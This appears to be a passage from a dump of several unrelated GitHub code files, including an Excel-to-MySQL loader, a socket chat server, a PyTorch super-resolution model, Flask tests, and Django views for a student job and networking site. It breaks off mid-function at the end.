plugin.process_yaml_object(obj)\n","repo_name":"tpot/YAMLJSONModel","sub_path":"yamljsonmodel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35855038002","text":"#!/usr/bin/python\n# -*- coding=utf-8 -*-\nimport pymysql\nimport xlrd\n\n\ndef con_mysql(list_cell):\n    try:\n        conn = pymysql.connect(\n            host=\"localhost\",\n            port=3306,\n            user=\"root\",\n            password=\"\",\n            database=\"test\",\n            charset=\"utf8\"\n        )\n        cusor = conn.cursor()\n        sql = \"\"\"\n        insert into testexcell (position,salary,company,address,experience,\n        education,com_type,fin_situation,total_people)\n        values (%s,%s,%s,%s,%s,%s,%s,%s,%s)\n        \"\"\"\n        for cell in list_cell:\n            cusor.execute(sql,cell)\n\n    except Exception as e:\n        print(e)\n    else:\n        return cusor,conn\ndef save_file(cusor):\n    sql = \"\"\"\n    select * from testexcell\n    \"\"\"\n    content = cusor.execute(sql)\n    content = cusor.fetchall()\n    with open(\"1.txt\",\"w\",encoding=\"utf8\") as fp:\n        for cells in content:\n            for cell in cells:\n                fp.write(cell)\n    cusor.close()\ndef read_xlas(fina_name):\n    bk = xlrd.open_workbook(filename=fina_name, encoding_override=\"gb2312\")\n    bk = bk.sheets()[0]\n    bk_rows = bk.nrows\n    bk_cols = bk.ncols\n    list_cell = []\n    for i in range(bk_rows):\n        cell = []\n        for j in range(bk_cols):\n            cell.append(bk.cell_value(i,j))\n        list_cell.append(cell)\n    cusor,conn = con_mysql(list_cell)\n    save_file(cusor)\n    conn.close()\nif __name__ == '__main__':\n    read_xlas(\"./boss直聘python职位_2019-07-02.xls\")","repo_name":"NarutoJxt/d_exercise","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7155753555","text":"\nimport socket\nimport threading\n\nclients = [] #Users who use this application\n\ndef handle_client(client_socket, client_address):\n    clients.append(client_socket)\n    while True:\n        message = client_socket.recv(1024)\n        if not message:\n            break\n        for myself in clients: #myself refers to each connected user; as long as he is not the one sending the message, he will receive it\n            if myself != client_socket:\n                myself.sendall(f\"{client_address}: {message.decode()}\".encode()) #so that the other users see the message instead of only the sender seeing it\n    clients.remove(client_socket)\n    client_socket.close()\n\n\n#clients.remove(client_socket) and client_socket.close()\n#are used to handle the closing of a client connection. clients.remove(client_socket)\n#removes the client socket from the list of connected clients,\n#while client_socket.close() closes the socket, freeing up system resources and ending the connection with the client.\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind((\"0.0.0.0\", 8000)) #The IP address and port this application listens on\nserver_socket.listen(5)\n\nprint(\"Listening on port 8000\")\n\nwhile True: #When a client connects to the server_socket, print which client has connected\n    client_socket, client_address = server_socket.accept()\n    print(f\"Accepted connection from {client_address}\")\n\n    client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address)) #Needed to start the handle_client function in its own thread\n    client_thread.start()\n","repo_name":"Deryja/ChatApp","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73150260304","text":"from accessToken import accessToken,find_route,get_route\nfrom flask import jsonify\nd = accessToken()\n#print(d)\nheaders = {'Authorization' : 'Bearer '}\nheaders['Authorization'] = headers['Authorization'] + d\n#print(headers)\nwp_1 = [37.770581,-122.442550]\nwp_2 = [37.765297,-122.442527]\n\nuseTraffic = \"true\"\nrouteOutputFields = \"D%2CS%2CW%2CB%2CI%2CU%2CP\"\nseperator = \"%2C\"\n\nreq = f\"/findRoute?wp_1={wp_1[0]}{seperator}{wp_1[1]}&wp_2={wp_2[0]}{seperator}{wp_2[1]}&maxAlternates=1&useTraffic={useTraffic}&routeOutputFields={routeOutputFields}&format=json\"\nfind_routes = find_route(headers,req)\n\nroute_id = find_routes['result']['trip']['tripId']\nprint(\"Trip ID:\", route_id)\n\nreq = f\"/route?routeId={route_id}&useTraffic={useTraffic}&routeType=0&routeOutputFields={routeOutputFields}&format=json\"\nget_routes_result = get_route(headers,req)\nprint(get_routes_result)\n\n","repo_name":"NisargVirvadia/Let-The-Ambulance-Pass-main","sub_path":"call_api.py","file_name":"call_api.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73746210384","text":"import torch\nimport torch.nn as nn\nfrom .blocks import ConvBlock, DeconvBlock, MeanShift\nimport numpy as np\nimport random\nimport torchvision\n\n#debug = True\ndebug = False\n\nclass VGG_Feat(nn.Module):\n    \"\"\"Using the first 4/6/8 layers of the VGG network for the RGB part\"\"\"\n    def __init__(self, depth):\n        super(VGG_Feat, self).__init__()\n        self.depth = depth\n        self.vgg_net = torchvision.models.vgg16(pretrained=True).features[:self.depth]\n    def forward(self, rgb):\n        rgb_feat = self.vgg_net(rgb)\n        return rgb_feat\n\nclass Self_Attn(nn.Module):\n    \"\"\"Implemented using conv layers\"\"\"\n    def __init__(self, in_channels):\n        #super(Self_Attn, self).__init__()\n        #self.conv_attn1 = nn.Sequential(nn.Conv2d(in_channels, 64, kernel_size = 3, padding=1), nn.PReLU(num_parameters=1, init=0.2))\n        #self.conv_attn2 = nn.Sequential(nn.Conv2d(64, 64, kernel_size = 3, padding=1), 
nn.PReLU(init=0.9), nn.InstanceNorm2d(64))\n #self.conv_attn3 = nn.Sequential(nn.Conv2d(64, in_channels, kernel_size = 3, padding=1), nn.BatchNorm2d(in_channels), nn.PReLU(num_parameters=1, init=0.2))\n \n super(Self_Attn, self).__init__()\n self.conv_attn1 = nn.Sequential(nn.Conv2d(in_channels, 256, kernel_size = 3, padding=1), nn.PReLU(num_parameters=1, init=0.2))\n self.conv_attn2 = nn.Sequential(nn.Conv2d(256, 512, kernel_size = 3, padding=1), nn.PReLU(init=0.9), nn.InstanceNorm2d(512))\n self.conv_attn3 = nn.Sequential(nn.Conv2d(512, 256, kernel_size = 3, padding=1), nn.PReLU(init=0.9), nn.InstanceNorm2d(256))\n self.conv_attn4 = nn.Sequential(nn.Conv2d(256, in_channels, kernel_size = 3, padding=1), nn.InstanceNorm2d(in_channels), nn.PReLU(init=0.9))\n def forward(self, features):\n x = self.conv_attn1(features)\n # np.save('x_1', x.detach().float().cpu().numpy().sum(1)[0])\n x = self.conv_attn2(x)\n # np.save('x_2', x.detach().float().cpu().numpy().sum(1)[0])\n x = self.conv_attn3(x)\n # np.save('x_3', x.detach().float().cpu().numpy().sum(1)[0])\n x = self.conv_attn4(x)\n return x\n\nclass FeedbackBlock(nn.Module):\n def __init__(self, num_features, num_groups, upscale_factor, act_type, norm_type):\n super(FeedbackBlock, self).__init__()\n if upscale_factor == 2:\n stride = 2\n padding = 2\n kernel_size = 6\n elif upscale_factor == 3:\n stride = 3\n padding = 2\n kernel_size = 7\n elif upscale_factor == 4:\n stride = 4\n padding = 2\n kernel_size = 8\n elif upscale_factor == 8:\n print('selecting scale fact 8')\n stride = 1\n padding = 1\n kernel_size = 3\n\n self.num_groups = num_groups\n\n self.compress_in = ConvBlock(2*num_features, num_features,\n kernel_size=1,\n act_type=act_type, norm_type=norm_type)\n\n self.upBlocks = nn.ModuleList()\n self.downBlocks = nn.ModuleList()\n self.uptranBlocks = nn.ModuleList()\n self.downtranBlocks = nn.ModuleList()\n\n\n for idx in range(self.num_groups):\n self.upBlocks.append(ConvBlock(num_features, num_features,\n kernel_size=kernel_size, stride=stride, padding=padding,\n act_type=act_type, norm_type=norm_type))\n self.downBlocks.append(ConvBlock(num_features, num_features,\n kernel_size=kernel_size, stride=stride, padding=padding,\n act_type=act_type, norm_type=norm_type, valid_padding=False))\n if idx > 0:\n self.uptranBlocks.append(ConvBlock(num_features*(idx+1), num_features,\n kernel_size=1, stride=1,\n act_type=act_type, norm_type=norm_type))\n self.downtranBlocks.append(ConvBlock(num_features*(idx+1), num_features,\n kernel_size=1, stride=1,\n act_type=act_type, norm_type=norm_type))\n\n self.compress_out = ConvBlock(num_groups*num_features, num_features,\n kernel_size=1,\n act_type=act_type, norm_type=norm_type)\n\n self.should_reset = True\n self.last_hidden = None\n \n self.gamma = nn.Parameter(torch.zeros(1))\n self.attn = Self_Attn(128) \n \n def forward(self, x, rgbf):\n if self.should_reset:\n self.last_hidden = torch.zeros(x.size()).cuda()\n self.last_hidden.copy_(x)\n self.should_reset = False\n \n # print('x ', x.shape)\n\n # print('self last hidden', self.last_hidden.shape)\n x = torch.cat((x, self.last_hidden), dim=1)\n\n x = self.compress_in(x)\n # print('compressed x', x.shape)\n lr_features = []\n hr_features = []\n lr_features.append(x)\n\n for idx in range(self.num_groups):\n LD_L = torch.cat(tuple(lr_features), 1) # when idx == 0, lr_features == [x]\n if idx > 0:\n LD_L = self.uptranBlocks[idx-1](LD_L)\n LD_H = self.upBlocks[idx](LD_L)\n\n hr_features.append(LD_H)\n\n LD_H = torch.cat(tuple(hr_features), 1)\n if idx 
> 0:\n                LD_H = self.downtranBlocks[idx-1](LD_H)\n                LD_L = self.downBlocks[idx](LD_H)\n\n                lr_features.append(LD_L)\n\n        del hr_features\n        output = torch.cat(tuple(lr_features[1:]), 1)  # leave out input x, i.e. lr_features[0]\n        output = self.compress_out(output)\n        if debug:\n            print('gamma', self.gamma)\n        attn = self.attn(torch.cat([output, rgbf], 1)) \n#the scale factor of 3 was used accidentally before training and hence carried forward;\n#it does not have any effect, as it is compensated by the self.gamma value\n        fused = output * attn[:,:64,:,:] + rgbf * self.gamma * attn[:,64:,:,:] \n        self.last_hidden = fused\n        return fused, attn\n\n    def reset_state(self):\n        self.should_reset = True\n\nclass SRFBN(nn.Module):\n    def __init__(self, in_channels, out_channels, num_features, num_steps, num_groups, upscale_factor, act_type = 'prelu', norm_type = None):\n        super(SRFBN, self).__init__()\n\n        if upscale_factor == 2:\n            stride = 2\n            padding = 2\n            kernel_size = 6\n\n        elif upscale_factor == 4:\n            stride = 1\n            padding = 2\n            kernel_size = 3\n        elif upscale_factor == 8:\n            stride = 1\n            padding = 3\n            kernel_size = 3\n\n        self.num_steps = num_steps\n        self.num_features = num_features\n        self.upscale_factor = upscale_factor\n\n\n\n        # LR feature extraction block\n        self.conv_in1 = ConvBlock(in_channels, 4*num_features,\n                                  kernel_size=3,\n                                  act_type=act_type, norm_type=norm_type)\n        self.feat_in1 = ConvBlock(4*num_features, num_features,\n                                  kernel_size=1,\n                                  act_type=act_type, norm_type=norm_type)\n\n        # conv2 is for rgb\n        self.conv_in2 = ConvBlock(3, 4*num_features,\n                                  kernel_size=3,\n                                  act_type=act_type, norm_type=norm_type)\n        self.conv_in2_down = ConvBlock(4*num_features,num_features,\n                                       kernel_size=3,stride=2,\n                                       act_type=act_type, norm_type=norm_type)\n        self.feat_in2 = ConvBlock(num_features, num_features,\n                                  kernel_size=1,\n                                  act_type=act_type, norm_type=norm_type)\n\n\n        # basic block\n        self.block = FeedbackBlock(num_features, num_groups, upscale_factor, act_type, norm_type)\n        # reconstruction block\n\t\t# uncomment for pytorch 0.4.0\n        # self.upsample = nn.Upsample(scale_factor=upscale_factor, mode='bilinear')\n\n        self.out = ConvBlock(num_features, num_features,\n                             kernel_size=3, stride=stride,\n                             act_type='prelu', norm_type=norm_type)\n\n        self.conv_out = ConvBlock(num_features, out_channels,\n                                  kernel_size=3,\n                                  act_type='prelu', norm_type=norm_type)\n\n        self.attn = Self_Attn(num_features * 2)\n        self.vgg_feat = VGG_Feat(4)\n        self.maxpool = nn.MaxPool2d(2)\n        self.gamma = nn.Parameter(torch.zeros(1))\n        # self.add_mean = MeanShift(rgb_mean, rgb_std, 1)\n        # self.interpolate_conv = ConvBlock(1, 1,\n        #                                   kernel_size=3,\n        #                                   act_type=act_type, norm_type=norm_type)\n\n    def forward(self, x, rgb):\n        self._reset_state()\n\n        # we are not using the operation below because our LR and HR sizes are the same\n        # inter_res = nn.functional.interpolate(x, scale_factor=self.upscale_factor, mode='bilinear', align_corners=False)\n        # print('before interpolate shape', x.shape)\n        # inter_res = self.interpolate_conv(x)\n\n        ILR = x\n\n        demf = self.conv_in1(x)\n        # print('after shape conv_in', x.shape)\n\n        # print('Conv in shape', x.shape)\n        demf = self.feat_in1(demf)\n\n        if debug:\n            for i in range(64):\n                np.save('before_demf_channel_{}'.format(i), demf.detach().float().cpu().numpy()[0][i])\n        rgbf = self.vgg_feat(rgb)\n        rgbf = self.maxpool(rgbf)\n        ############################## LR block over ##################################\n\n        if debug:\n            for i in range(10):\n                np.save('rgb_channel_{}'.format(i), rgbf.detach().float().cpu().numpy()[0][i])\n        outputs = []\n\n        for 
step_no in range(self.num_steps):\n if debug:\n for i in range(64):\n np.save('demf_step_{}_channel_{}'.format(step_no, i), demf.detach().float().cpu().numpy()[0][i])\n \n fused, attn = self.block(demf, rgbf)\n #print('attn shape', attn.shape)\n #attn = self.attn(h)\n max_demf_attn, _ = torch.max(attn[:,:64,:,:], 1)\n max_rgbf_attn, _ = torch.max(attn[:,64:,:,:],1)\n\n if debug:\n print('channel pool dim demf', max_demf_attn.shape)\n np.save('max_demf_attn_step_no_{}'.format(step_no), max_demf_attn.detach().cpu().numpy()[0]) \n np.save('max_rgbf_attn_step_no_{}'.format(step_no), max_rgbf_attn.detach().cpu().numpy()[0])\n if debug: \n for i in range(10):\n np.save('attn_map_step_no_{}_channel_{}'.format(step_no, i), attn.detach().float().cpu().numpy()[0][i])\n for i in range(64,74):\n np.save('attn_map_step_no_{}_channel_{}'.format(step_no, i), attn.detach().float().cpu().numpy()[0][i])\n\n #fused = demf * attn[:,:64,:,:] + rgbf * self.gamma * attn[:,64:,:,:] \n if debug: \n for i in range(10):\n np.save('fused_step_{}_channel_{}'.format(step_no, i), fused.detach().float().cpu().numpy()[0][i])\n \n residual = self.conv_out(self.out(fused))\n out = torch.add(ILR, residual)\n\n outputs.append(out)\n return outputs # return output of every timesteps\n \n def _reset_state(self):\n self.block.reset_state()\n\n","repo_name":"ashj9/AFN","sub_path":"networks/srfbn_arch.py","file_name":"srfbn_arch.py","file_ext":"py","file_size_in_byte":11755,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28528995304","text":"from flask import url_for\nfrom flask_testing import TestCase\n\nfrom app import create_app, db\nfrom app.models import User\n\n\nclass TodolistClientTestCase(TestCase):\n def create_app(self):\n return create_app(\"testing\")\n\n def setUp(self):\n db.create_all()\n self.username_alice = \"alice\"\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def register_user(self, name):\n response = self.client.post(\n url_for(\"auth.register\"),\n data={\n \"username\": name,\n \"email\": name + \"@example.com\",\n \"password\": \"correcthorsebatterystaple\",\n \"password_confirmation\": \"correcthorsebatterystaple\",\n },\n )\n return response\n\n def login_user(self, name):\n response = self.client.post(\n url_for(\"auth.login\"),\n data={\n \"email_or_username\": name + \"@example.com\",\n \"password\": \"correcthorsebatterystaple\",\n },\n )\n return response\n\n def register_and_login(self, name):\n response = self.register_user(name)\n self.assert_redirects(response, \"/auth/login\")\n response = self.login_user(name)\n self.assert_redirects(response, \"/\")\n\n def test_home_page(self):\n response = self.client.get(url_for(\"main.index\"))\n self.assert_200(response)\n self.assert_template_used(\"index.html\")\n\n def test_register_page(self):\n response = self.client.get(url_for(\"auth.register\"))\n self.assert_200(response)\n self.assert_template_used(\"register.html\")\n\n def test_login_page(self):\n response = self.client.get(url_for(\"auth.login\"))\n self.assert_200(response)\n self.assert_template_used(\"login.html\")\n\n def test_overview_page(self):\n self.register_and_login(self.username_alice)\n response = self.client.get(url_for(\"main.todolist_overview\"))\n # expect not redirect as user is logged in\n self.assert_200(response)\n self.assert_template_used(\"overview.html\")\n\n def test_last_seen_update_after_login(self):\n self.register_user(self.username_alice)\n user = 
User.query.filter_by(username=self.username_alice).first()\n before = user.last_seen\n self.login_user(self.username_alice)\n after = user.last_seen\n self.assertNotEqual(before, after)\n\n def test_register_and_login_and_logout(self):\n # register a new account\n response = self.register_user(self.username_alice)\n # expect redirect to login\n self.assert_redirects(response, \"/auth/login\")\n\n # login with the new account\n response = self.login_user(self.username_alice)\n # expect redirect to index\n self.assert_redirects(response, \"/\")\n\n # logout\n response = self.client.get(url_for(\"auth.logout\"), follow_redirects=True)\n # follow redirect to index\n self.assert_200(response)\n self.assert_template_used(\"index.html\")\n","repo_name":"rtzll/flask-todolist","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"48"} +{"seq_id":"24379121461","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Project : flask-mega-tutorial\n# @Author : Administrator\n# @CreateTime : 2019/5/22 9:09\n# @File : extensions.py\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db)\n","repo_name":"wanwei890/pytestdemo","sub_path":"mytools/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1793020740","text":"from django.shortcuts import render, redirect\nfrom .forms import NewUserForm, NewJobForm, LookupByName, ChangeLangForm, LookupByCollege, LookupByMajor\nfrom .forms import ChangeSettingForm, ProfileCreationForm, ApplicationForm\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom .models import Job, userSetting, UserInfo, Friend_Request\nfrom .models import Notification, JobUserR\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nimport datetime\n\n# Create your views here.\ndef homepage(request):\n\tif request.user.is_authenticated:\n\t\tfriendRequest = Friend_Request.objects.filter(to_user=request.user).filter(valid=True)\n\t\tnotis = Notification.objects.filter(user=request.user)\n\telse:\n\t\tfriendRequest = None\n\t\tnotis = None\n\treturn render(request=request, template_name='home/home.html', context={\n\t\t'friendRequest':friendRequest,\n\t\t'notis': notis,\n\t})\n\ndef job_search(request):\n\tjobs = Job.objects.exclude(creator=request.user)\n\tnotis = Notification.objects.filter(user=request.user).filter(isAboutJob=True)\n\n\tfor noti in notis:\n\t\tnoti.delete()\n\n\treturn render(request, 'home/jobsearch.html', context={'jobs': jobs,\n\t\t\t\t\t\t\"notis\": notis, })\ndef makeajob(request):\n\tif len(Job.objects.all()) >= 10:\n\t\tmessages.error(request, f\"Sorry, we have reached our max jobs counts, please check back later.\")\n\t\treturn redirect(\"home:jobsearch\")\n\tif request.method == 'POST':\n\t\tform = NewJobForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnewJob = form.save(commit=False)\n\t\t\tnewJob.creator = request.user\n\t\t\tnewJob.save()\n\t\t\tjobs = Job.objects.all()\n\t\t\tmessages.success(request, f\"Job created\")\n\t\t\treturn 
redirect('home:jobs')\n\telse:\n\t\tform = NewJobForm()\n\treturn render(request, 'home/makeajob.html', {'form': form})\n\ndef find_someone(request):\n\tcurU = User.objects.get(pk=request.user.pk) \n\tform = LookupByName()\n\tform2 = LookupByCollege()\n\tform3 = LookupByMajor()\n\tuser = None\n\tif request.method == \"POST\":\n\t\tprint(request.POST)\n\t\tif \"name-bnt\" in request.POST:\n\t\t\tform = LookupByName(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tfirst_name = form.cleaned_data.get('first_name')\n\t\t\t\tlast_name = form.cleaned_data.get('last_name')\n\t\t\t\t\n\t\t\t\tuser = User.objects.filter(first_name=first_name).filter(last_name=last_name)\n\t\t\t\tprint(user)\n\t\t\t\tif len(user) >= 1:\n\t\t\t\t\tmessages.success(request, \"They are a part of the InCollege system.\")\n\t\t\t\telse:\n\t\t\t\t\tmessages.error(request,\"They are not yet a part of the InCollege system yet.\")\n\n\t\tif \"college-bnt\" in request.POST:\n\t\t\tform2 = LookupByCollege(request.POST)\n\t\t\tif form2.is_valid():\n\t\t\t\tcollege = form2.cleaned_data.get('college')\n\t\t\t\t\n\t\t\t\tuser = UserInfo.objects.filter(university=college)\n\t\t\t\tlinkBack = []\n\t\t\t\tfor i in user:\n\t\t\t\t\tlinkBack.append(i.user)\n\t\t\t\tuser = linkBack\n\t\t\t\tif len(user) >= 1:\n\t\t\t\t\tmessages.success(request, \"They are a part of the InCollege system.\")\n\t\t\t\telse:\n\t\t\t\t\tmessages.error(request,\"They are not yet a part of the InCollege system yet.\")\n\n\t\tif \"major-bnt\" in request.POST:\n\t\t\tform3 = LookupByMajor(request.POST)\n\t\t\tif form3.is_valid():\n\t\t\t\tmajor = form3.cleaned_data.get('major')\n\t\t\t\t\n\t\t\t\tuser = UserInfo.objects.filter(major=major)\n\t\t\t\tlinkBack = []\n\t\t\t\tfor i in user:\n\t\t\t\t\tlinkBack.append(i.user)\n\t\t\t\tuser = linkBack\n\t\t\t\tif len(user) >= 1:\n\t\t\t\t\tmessages.success(request, \"They are a part of the InCollege system.\")\n\t\t\t\telse:\n\t\t\t\t\tmessages.error(request,\"They are not yet a part of the InCollege system yet.\")\n\n\treturn render(request=request, template_name='home/findsomeone.html',context={'form':form,'form2':form2,'form3':form3,'users':user})\n\ndef skill(request):\n\treturn render(request=request, template_name='home/skill.html')\n\ndef underConstruction(request):\n\treturn render(request=request, template_name='home/under_construction.html')\n\ndef register_request(request):\n\tform = NewUserForm()\n\tif len(User.objects.all()) >= 10 :\n\t\tmessages.error(request, \"Sorry, we have reached max users, check back later!\" )\n\t\treturn redirect(\"home:homepage\")\n\tif request.method == \"POST\":\n\t\tform = NewUserForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser = form.save()\n\t\t\tlogin(request, user)\n\t\t\tmessages.success(request, \"Registration successful.\" )\n\t\t\treturn redirect(\"home:homepage\")\n\t\tmessages.error(request, \"Unsuccessful registration. 
Invalid information.\")\n\treturn render (request=request, template_name=\"home/register.html\", context={\"register_form\":form})\n\ndef login_request(request):\n\tform = AuthenticationForm()\n\tif request.method == \"POST\":\n\t\tform = AuthenticationForm(request, data=request.POST)\n\t\tif form.is_valid():\n\t\t\tusername = form.cleaned_data.get('username')\n\t\t\tpassword = form.cleaned_data.get('password')\n\t\t\tuser = authenticate(username=username, password=password)\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\tmessages.info(request, f\"You are now logged in as {username}.\")\n\t\t\t\treturn redirect(\"home:homepage\")\n\t\t\telse:\n\t\t\t\tmessages.error(request,\"Invalid username or password.\")\n\t\telse:\n\t\t\tmessages.error(request,\"Invalid username or password.\")\n\treturn render(request=request, template_name=\"home/login.html\", context={\"login_form\":form})\n\ndef logout_request(request):\n\tlogout(request)\n\tmessages.info(request, \"You have successfully logged out.\") \n\treturn redirect(\"home:homepage\")\n\ndef video_display(request):\n\treturn render(request=request, template_name='home/video_display.html')\n\n\ndef general(request):\n\treturn render(request=request, template_name='home/general.html')\n\ndef Browse_InCollege(request):\n\treturn render(request=request, template_name='home/Browse_InCollege.html')\n\ndef buisness_solutions(request):\n\treturn render(request=request, template_name='home/buisness_solutions.html')\n\ndef Directories(request):\n\treturn render(request=request, template_name='home/Directories.html')\n\ndef copyright_notice(request):\n\treturn render(request=request, template_name='home/copyright_notice.html')\n\ndef About(request):\n\treturn render(request=request, template_name='home/About.html')\n\ndef Accessibility(request):\n\treturn render(request=request, template_name='home/Accessibility.html')\n\ndef User_Agreement(request):\n\treturn render(request=request, template_name='home/User_Agreement.html')\n\ndef Privacy_Policy(request):\n\treturn render(request=request, template_name='home/Privacy_Policy.html')\n\ndef Cookie_Policy(request):\n\treturn render( request = request, template_name = \"home/Cookie_policy.html\")\n\ndef Copyright_Policy(request):\n\treturn render(request=request, template_name='home/CopyRight_Policy.html')\n\ndef Brand_Policy(request):\n\treturn render(request=request, template_name='home/Brand_Policy.html')\n\ndef Guest_Controls(request):\n\tform = ChangeSettingForm()\n\tif request.method == \"POST\":\n\t\tprint(request.POST)\n\t\tform = ChangeSettingForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tusrSet, _ = userSetting.objects.get_or_create(user=request.user)\n\t\t\tusrSet.email = form.cleaned_data.get('email')\n\t\t\tusrSet.sms = form.cleaned_data.get('sms')\n\t\t\tusrSet.targetedAds = form.cleaned_data.get('targetedAds')\n\t\t\tusrSet.save()\n\n\t\t\tmessages.success(request,\"Updated\")\n\t\telse:\n\t\t\tmessages.error(request,\"Fail to update.\")\n\t\treturn redirect(\"home:homepage\")\n\treturn render(request=request, template_name='home/Guest_Controls.html',context={\"form\":form})\n\ndef Languages(request):\n\tform = ChangeLangForm()\n\tif request.method == \"POST\":\n\t\tprint(request.POST)\n\t\tform = ChangeLangForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tusrSet, _ = userSetting.objects.get_or_create(user=request.user)\n\t\t\tusrSet.english = 
form.cleaned_data.get('isEnglish')\n\t\t\tusrSet.save()\n\t\t\tmessages.success(request,\"Updated\")\n\t\telse:\n\t\t\tmessages.error(request,\"Failed to update.\")\n\t\t\treturn redirect(\"home:homepage\")\n\treturn render(request=request, template_name='home/Languages.html',context={\"form\":form})\n\ndef Help_Center(request):\n\treturn render(request=request, template_name='home/Help_Center.html')\n\ndef Press(request):\n\treturn render(request=request, template_name='home/Press.html')\n\ndef Blog(request):\n\treturn render(request=request, template_name='home/Blog.html')\n\ndef Careers(request):\n\treturn render(request=request, template_name='home/Careers.html')\n\ndef Developers(request):\n\treturn render(request=request, template_name='home/Developers.html')\n\ndef NetworkView(request):\n\tfriends = Friend_Request.objects.filter(accepted=True).filter(Q(to_user=request.user) | Q(from_user=request.user))\n\tprint(friends)\n\treturn render(request=request, template_name='home/networks.html',context={'friends':friends})\n\n\ndef send_friend_request_view(request,pk=None):\n\tfrom_user = request.user\n\tto_user = User.objects.get(pk=pk)\n\tobj = Friend_Request.objects.get_or_create(from_user=from_user,to_user=to_user)\n\tmessages.success(request,\"Request sent\")\n\treturn redirect(\"home:findsomeone\")\ndef accept_friend_request_view(request,pk=None):\n\tfriendRequest = Friend_Request.objects.get(pk=pk)\n\tfriendRequest.accepted = True\n\tfriendRequest.valid = False\n\tfriendRequest.save()\n\tmessages.success(request,\"You are now friends\")\n\treturn redirect(\"home:homepage\")\ndef reject_friend_request_view(request,pk=None):\n\tfriendRequest = Friend_Request.objects.get(pk=pk)\n\tfriendRequest.accepted = False\n\tfriendRequest.valid = False\n\tfriendRequest.save()\n\tmessages.success(request,\"Request Rejected\")\n\treturn redirect(\"home:homepage\")\ndef remove_friend_request_view(request,pk=None):\n\tFriend_Request.objects.get(pk=pk).delete()\n\tmessages.success(request,\"Friend Deleted!\")\n\treturn redirect(\"home:Networks\")\n\n\ndef edit_Profile(request):\n\tform = ProfileCreationForm()\n\tcurUserinfo, _ = UserInfo.objects.get_or_create(user=request.user)\n\tform = ProfileCreationForm(instance=curUserinfo)\n\n\tif request.method == \"POST\":\n\t\tform = ProfileCreationForm(request.POST,instance=curUserinfo)\n\t\tif form.is_valid():\n\t\t\tnewP=form.save(commit=False)\n\t\t\tnewP.profileSet=True\n\t\t\tif newP.major is not None:\n\t\t\t\tnewP.major = newP.major.title()\n\t\t\tif newP.university is not None:\n\t\t\t\tnewP.university = newP.university.title()\n\t\t\tif newP.schoolName is not None:\n\t\t\t\tnewP.schoolName = newP.schoolName.title()\n\n\t\t\tnewP.save()\n\t\t\tmessages.success(request,\"Profile Updated\")\n\t\t\treturn redirect(\"home:homepage\")\n\t\telse:\n\t\t\tmessages.error(request,\"Profile failed to update\")\n\treturn render(request=request, template_name=\"home/editProfile.html\", context={'form':form})\n\n\ndef Profile_view(request,pk=None):\n\ttarget = User.objects.get(pk=pk)\n\t\n\tuserConnections = Friend_Request.objects.filter(accepted=True).filter((Q(to_user=request.user) & Q(from_user=target))|(Q(from_user=request.user) & Q(to_user=target)))\n\tprofile=None\n\tisFriend=False\n\thasProfile=False\n\tif userConnections.count() != 0:\n\t\tisFriend = True\n\t\tprofile = target.userinfo_set.all()[0]\n\t\thasProfile = profile.profileSet\n\tif request.user.pk == pk:\n\t\thasProfile=True\n\t\tisFriend = True\n\t\tprofile = 
target.userinfo_set.all()[0]\n\treturn render(request=request, template_name=\"home/Profile.html\",context={'target':target,'profile':profile,'isFriend':isFriend,'hasProfile':hasProfile})\n\ndef noApplyJobView(request):\n\tapplied = JobUserR.objects.filter(Q(isApply=True))\n\tprint(applied)\n\tapplied = applied.values_list(\"jid\")\n\tprint(applied)\n\tjobs = Job.objects.exclude(pk__in=applied).exclude(creator=request.user)\n\n\tcontext = {\n\t\t\"jobs\":jobs,\n\t}\n\treturn render(request=request, template_name=\"home/notappliedjobs.html\",context=context)\ndef myJobView(request):\n\tmyJobs = Job.objects.filter(creator=request.user)\n\trelatedJobs = JobUserR.objects.filter(uid=request.user)\n\tappliedJobs = []\n\tsavedJobs = []\n\tfor jobR in relatedJobs:\n\t\tif jobR.isApply:\n\t\t\tappliedJobs.append(jobR.jid)\n\t\tif jobR.isStarted:\n\t\t\tsavedJobs.append(jobR.jid)\n\tcontext = {\n\t\t\"myJobs\": myJobs,\n\t\t\"appliedJobs\": appliedJobs,\n\t\t\"savedJobs\": savedJobs,\n\t}\n\treturn render(request=request, template_name=\"home/myjobs.html\",context=context)\n\ndef jobDetailView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"No Such Job\")\n\t\treturn 